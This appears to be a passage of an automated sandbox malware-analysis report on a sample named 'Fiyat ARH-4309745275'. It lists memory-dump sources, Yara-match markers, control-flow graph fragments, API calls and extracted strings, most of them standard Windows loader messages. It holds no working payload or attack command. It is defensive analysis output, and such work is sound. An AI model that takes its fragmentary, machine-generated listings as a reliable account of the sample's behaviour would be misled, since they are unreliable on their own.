                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 7454168B$7454168B
                  • API String ID: 0-2062695193

                  Control-flow Graph

                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193

                  Control-flow Graph

                  control_flow_graph 30 413ebb-413ed5 31 413edd-413f2d call 42de03 call 417893 call 404893 call 4246e3 30->31 32 413ed8 call 42d3f3 30->32 42 413f4d-413f53 31->42 43 413f2f-413f3e PostThreadMessageW 31->43 32->31 43->42 44 413f40-413f4a 43->44 44->42
                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193

                  Control-flow Graph

                  APIs
                  • PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 7454168B$7454168B
                  • API String ID: 1836367815-2062695193

                  Control-flow Graph

                  control_flow_graph 69 42b7c3-42b807 call 404923 call 42c523 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B802
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: AfA
                  • API String ID: 3298025750-3160769474

                  Control-flow Graph

                  control_flow_graph 117 42b773-42b7b7 call 404923 call 42c523 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E09B,?,?,00000000,?,0041E09B,?,?,?), ref: 0042B7B2
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0

                  Control-flow Graph

                  control_flow_graph 127 42b813-42b84f call 404923 call 42c523 ExitProcess
                  APIs
                  • ExitProcess.KERNEL32(?,00000000,?,?,AF9D693A,?,?,AF9D693A), ref: 0042B84A
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0

                  Control-flow Graph

                  control_flow_graph 132 417924-417936 133 417901-417907 LdrLoadDll 132->133 134 417938-41793f 132->134 135 41790a-41790d 133->135
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_Fiyat ARH-4309745275.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0

                  Control-flow Graph

                  control_flow_graph 136 1b12c0a-1b12c0f 137 1b12c11-1b12c18 136->137 138 1b12c1f-1b12c26 LdrInitializeThunk 136->138
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2160512332
                  Strings
                  • corrupted critical section, xrefs: 01B454C2
                  • Critical section address, xrefs: 01B45425, 01B454BC, 01B45534
                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B454CE
                  • Address of the debug info found in the active list., xrefs: 01B454AE, 01B454FA
                  • Critical section address., xrefs: 01B45502
                  • Thread identifier, xrefs: 01B4553A
                  • double initialized or corrupted critical section, xrefs: 01B45508
                  • Thread is in a state in which it cannot own a critical section, xrefs: 01B45543
                  • Critical section debug info address, xrefs: 01B4541F, 01B4552E
                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B454E2
                  • Invalid debug info address of this critical section, xrefs: 01B454B6
                  • undeleted critical section in freed memory, xrefs: 01B4542B
                  • 8, xrefs: 01B452E3
                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B4540A, 01B45496, 01B45519
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                  • API String ID: 0-2368682639
                  Strings
                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B4261F
                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B42412
                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B42498
                  • @, xrefs: 01B4259B
                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B42506
                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B424C0
                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B42409
                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B422E4
                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B42624
                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B425EB
                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B42602
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                  • API String ID: 0-4009184096
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                  • API String ID: 0-2515994595
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-1700792311
                  Strings
                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B58A3D
                  • VerifierDebug, xrefs: 01B58CA5
                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B58A67
                  • HandleTraces, xrefs: 01B58C8F
                  • AVRF: -*- final list of providers -*- , xrefs: 01B58B8F
                  • VerifierDlls, xrefs: 01B58CBD
                  • VerifierFlags, xrefs: 01B58C50
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                  • API String ID: 0-3223716464
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                  • API String ID: 0-1109411897
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-792281065
                  Strings
                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B29A01
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B29A11, 01B29A3A
                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B29A2A
                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B299ED
                  • apphelp.dll, xrefs: 01AC6496
                  • LdrpInitShimEngine, xrefs: 01B299F4, 01B29A07, 01B29A30
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-204845295
                  Strings
                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B481E5
                  • LdrpInitializeProcess, xrefs: 01B0C6C4
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B0C6C3
                  • minkernel\ntdll\ldrredirect.c, xrefs: 01B48181, 01B481F5
                  • Loading import redirection DLL: '%wZ', xrefs: 01B48170
                  • LdrpInitializeImportRedirection, xrefs: 01B48177, 01B481EB
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-475462383
                  Strings
                  • SXS: %s() passed the empty activation context, xrefs: 01B42165
                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B42178
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B421BF
                  • RtlGetAssemblyStorageRoot, xrefs: 01B42160, 01B4219A, 01B421BA
                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B42180
                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B4219F
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                  • API String ID: 0-861424205
                  APIs
                    • Part of subcall function 01B12DF0: LdrInitializeThunk.NTDLL ref: 01B12DFA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10BA3
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10BB6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10D60
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B10D74
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                  • String ID:
                  • API String ID: 1404860816-0
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                  • API String ID: 0-379654539
                  Strings
                  • LdrpInitializeProcess, xrefs: 01B08422
                  • @, xrefs: 01B08591
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B08421
                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B0855E
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1918872054
                  Strings
                  • .Local, xrefs: 01B028D8
                  • SXS: %s() passed the empty activation context, xrefs: 01B421DE
                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B422B6
                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B421D9, 01B422B1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                  • API String ID: 0-1239276146
                  Strings
                  • RtlDeactivateActivationContext, xrefs: 01B43425, 01B43432, 01B43451
                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B43437
                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B4342A
                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B43456
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                  • API String ID: 0-1245972979
                  Strings
                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B31028
                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B3106B
                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B310AE
                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B30FE5
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                  • API String ID: 0-1468400865
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B3A9A2
                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B3A992
                  • LdrpDynamicShimModule, xrefs: 01B3A998
                  • apphelp.dll, xrefs: 01AF2462
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-176724104
                  Strings
                  • HEAP[%wZ]: , xrefs: 01AE3255
                  • HEAP: , xrefs: 01AE3264
                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AE327D
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                  • API String ID: 0-617086771
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-4253913091
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $@
                  • API String ID: 0-1077428164
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: FilterFullPath$UseFilter$\??\
                  • API String ID: 0-2779062949
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B3A121
                  • Failed to allocated memory for shimmed module list, xrefs: 01B3A10F
                  • LdrpCheckModule, xrefs: 01B3A117
                  Similarity
                  • API ID:
                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B482E8
                  • Failed to reallocate the system dirs string !, xrefs: 01B482D7
                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01B482DE
                  Similarity
                  • API ID:
                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                  Strings
                  • @, xrefs: 01B8C1F1
                  • PreferredUILanguages, xrefs: 01B8C212
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B8C1C5
                  Similarity
                  • API ID:
                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                  Strings
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                  Strings
                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B54888
                  • minkernel\ntdll\ldrredirect.c, xrefs: 01B54899
                  • LdrpCheckRedirection, xrefs: 01B5488F
                  Similarity
                  • API ID:
                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                  Strings
                  Similarity
                  • API ID:
                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B52104
                  • LdrpInitializationFailure, xrefs: 01B520FA
                  • Process initialization failed with status 0x%08lx, xrefs: 01B520F3
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                  APIs
                  Strings
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: #%u
                  Strings
                  • LdrResSearchResource Enter, xrefs: 01ADAA13
                  • LdrResSearchResource Exit, xrefs: 01ADAA25
                  Similarity
                  • API ID:
                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                  Strings
                  Similarity
                  • API ID:
                  • String ID: `$`
                  Strings
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
                  Strings
                  Similarity
                  • API ID:
                  • String ID: @$MUI
                  Strings
                  • kLsE, xrefs: 01AD0540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AD063D
                  Similarity
                  • API ID:
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  Strings
                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01ADA2FB
                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01ADA309
                  Similarity
                  • API ID:
                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                  Strings
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Cleanup Group$Threadpool!
                  Strings
                  Similarity
                  • API ID:
                  • String ID: MUI
                  Strings
                  Similarity
                  • API ID:
                  • String ID: GlobalTags
                  Strings
                  Similarity
                  • API ID:
                  • String ID: .mui
                  Strings
                  Similarity
                  • API ID:
                  • String ID: EXT-
                  Strings
                  Similarity
                  • API ID:
                  • String ID: BinaryHash
                  Strings
                  Similarity
                  • API ID:
                  • String ID: #
                  Strings
                  Similarity
                  • API ID:
                  • String ID: BinaryName
                  Strings
                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B5895E
                  Similarity
                  • API ID:
                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
